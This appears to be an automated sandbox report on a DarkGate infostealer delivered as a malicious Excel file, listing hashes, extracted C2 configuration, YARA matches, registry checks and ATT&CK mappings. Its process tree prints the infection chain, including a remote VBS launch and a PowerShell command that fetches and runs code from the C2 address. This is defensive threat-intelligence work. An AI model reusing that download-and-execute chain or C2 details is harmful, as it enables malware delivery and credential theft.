darkgate | a60239b753c1a5ae7e2820f11a4084752fc409338746c4166b3cedc28b4e8dce

General

Target

statapril2024-9733.xlsx
Size

56KB
MD5

1c9558bf179c79b1c5f5e01970d190c5
SHA1

007c8fac9c1fa4940750b0c95723d63ca7030d78
SHA256

186efcf47d140b869ec75d0d4f3c90ddf4d95c6378cb0195c2be293ccb646899
SHA512

378d95f25a82a1860a27927dc2bca6eeabdb323d88014f158392d732965046518fa19f344bb1d3d392dd1be728b5bf646ec885fdf548b6e9106d58e8c8b20738
SSDEEP

768:ZFnM1dDlT2qpaOKFSGOJdGvoZCPAUJ1YxBardD2TSWGdCIKD15ogXnlq5I3:/mZ2u4OPKIxoEuDKJnlj3

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

103.124.106.237

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
bedxvHpr
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 4 IoCs

resource	yara_rule
behavioral2/memory/636-62-0x0000000002DC0000-0x0000000002E34000-memory.dmp	family_darkgate_v6
behavioral2/memory/636-64-0x0000000002DC0000-0x0000000002E34000-memory.dmp	family_darkgate_v6
behavioral2/memory/3600-134-0x0000000004670000-0x00000000046E4000-memory.dmp	family_darkgate_v6
behavioral2/memory/3600-136-0x0000000004670000-0x00000000046E4000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1180	4220	WScript.exe	83
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4600	4220	WScript.exe	83

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4220	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE
4220	EXCEL.EXE

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3728	attrib.exe
1356	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\statapril2024-9733.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4220
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"
  2⤵
  - Process spawned unexpected child process
  PID:1180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')
    3⤵
    PID:1912
  - - C:\kady\AutoHotkey.exe
      "C:\kady\AutoHotkey.exe" C:/kady/script.ahk
      4⤵
      PID:636
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/kady/
      4⤵
      Views/modifies file attributes
      PID:3728
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"
  2⤵
  - Process spawned unexpected child process
  PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')
    3⤵
    PID:856
  - - C:\kady\AutoHotkey.exe
      "C:\kady\AutoHotkey.exe" C:/kady/script.ahk
      4⤵
      PID:3600
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/kady/
      4⤵
      Views/modifies file attributes
      PID:1356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
575823193d99373f668956ccfe14c076

SHA1
873153cadd6a153ec6867717bcf7594442bdc830

SHA256
7cfe94799f1b3e119a0bddc8e22084e6fb2e4f206a22b3d07e349f8db340764f

SHA512
986db1b72b1181c9103ead2c38af153aba0bdc21fb84fc097dff049c12838c41a9c7b7aff76da0d0248843c4c338ddc3431d2502cf09e37e3491fe2e1d3fa1c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a4ec988dc7490fc575a308d35d9dc987

SHA1
8f59e156e855a9a4675161cf26c5781c7f155b4b

SHA256
8f8c60c949871d482a0209828f151c505e6913f17e67a3e45f6f574eef8052c9

SHA512
57dec4141bba0fb2d0cabe0fb58a493252fa60c62014061f26c76a7b2b346ec7957ae752ae8de01fe5f2279037e243da4a51a399496e2ec24b2de8d64ab91663

Download Submit
C:\Users\Admin\AppData\Local\Temp\14885E00

Filesize
57KB

MD5
64ed75358a3d5feac3f46bf2c6fb60d8

SHA1
acc9241d4451957b6efa9295cf2fb9820eb4205c

SHA256
c098129943eb657a143f7a8d7edb4e9b76ca9c8a6f9befea1467684b04c8bd96

SHA512
a761f77015e650217bb03bbee303a9844e31d3c460857042638cd4608b7b57d5c59064cdfd9bb5c933e6104421f43cf4d79a181a087d9eae2301f07a0bda84be

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hsexdq2.jqt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\HcDaeHA

Filesize
32B

MD5
850a80598386639226c75f1f566a1302

SHA1
a985004c9a6bdff0dd86fbef89101147153c363e

SHA256
be06ba05be78a2ca1eac21eb6ac4c043973d55d35278de7a11be2f23bc8e54ff

SHA512
caf1637a193d1a311c82e8a95af67e04220aab8b5364e6b45d328476381feb5ed9c8ed9377054e279d541d3b271c7fe6012c22d9b60a79cc8bac1a8e8dfb1ce6

Download Submit
C:\kady\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\kady\script.ahk

Filesize
441B

MD5
958cd4a849145b96e92e63ef4e152349

SHA1
19d79b480294e7c329c19faf87fc5e3320268caa

SHA256
8e7070383517cc127dfff26a726a47fc48a9169591e29c8d16df6fdd6d2c591e

SHA512
7852834cf31f55c6d97fdc204b59b8177d336c1f5ee1a14ae880e34c3e8c407953f1722274c040c93c5ac978f1a6ddb9d4a1b5019b6d3a99dd081440528210a0

Download Submit
C:\kady\test.txt

Filesize
922KB

MD5
8ed12b37b69693e66f928cd39fc21c6c

SHA1
2ee8c14330d38f3ba3c23e4bb56c05b29191ff03

SHA256
70223ac25fecd28385f39f36367f93b045c312f062354497dd2702e7d295784d

SHA512
50daf960cd89efe9b562db00177f27f3ba9e0929be830406857d9879a49c58f62d5d03c1b01c83104f47784da02b2cc2fab28c9b653e1a1861d4b319271e2795

Download Submit
memory/636-64-0x0000000002DC0000-0x0000000002E34000-memory.dmp

Filesize
464KB

Download
memory/636-62-0x0000000002DC0000-0x0000000002E34000-memory.dmp

Filesize
464KB

Download
memory/856-132-0x00007FFA45980000-0x00007FFA46441000-memory.dmp

Filesize
10.8MB

Download
memory/856-81-0x0000025A90C80000-0x0000025A90C90000-memory.dmp

Filesize
64KB

Download
memory/856-79-0x00007FFA45980000-0x00007FFA46441000-memory.dmp

Filesize
10.8MB

Download
memory/856-80-0x0000025A90C80000-0x0000025A90C90000-memory.dmp

Filesize
64KB

Download
memory/1912-37-0x000001DF6F340000-0x000001DF6F362000-memory.dmp

Filesize
136KB

Download
memory/1912-60-0x00007FFA45980000-0x00007FFA46441000-memory.dmp

Filesize
10.8MB

Download
memory/1912-38-0x00007FFA45980000-0x00007FFA46441000-memory.dmp

Filesize
10.8MB

Download
memory/1912-40-0x000001DF570E0000-0x000001DF570F0000-memory.dmp

Filesize
64KB

Download
memory/1912-39-0x000001DF570E0000-0x000001DF570F0000-memory.dmp

Filesize
64KB

Download
memory/1912-41-0x000001DF6F930000-0x000001DF6FAF2000-memory.dmp

Filesize
1.8MB

Download
memory/3600-136-0x0000000004670000-0x00000000046E4000-memory.dmp

Filesize
464KB

Download
memory/3600-134-0x0000000004670000-0x00000000046E4000-memory.dmp

Filesize
464KB

Download
memory/4220-11-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-1-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-27-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-26-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-13-0x00007FFA2F150000-0x00007FFA2F160000-memory.dmp

Filesize
64KB

Download
memory/4220-4-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-3-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-7-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-12-0x00007FFA2F150000-0x00007FFA2F160000-memory.dmp

Filesize
64KB

Download
memory/4220-10-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-0-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-6-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-117-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-118-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-116-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-115-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-114-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-8-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-5-0x00007FFA319B0000-0x00007FFA319C0000-memory.dmp

Filesize
64KB

Download
memory/4220-2-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download
memory/4220-9-0x00007FFA71930000-0x00007FFA71B25000-memory.dmp

Filesize
2.0MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads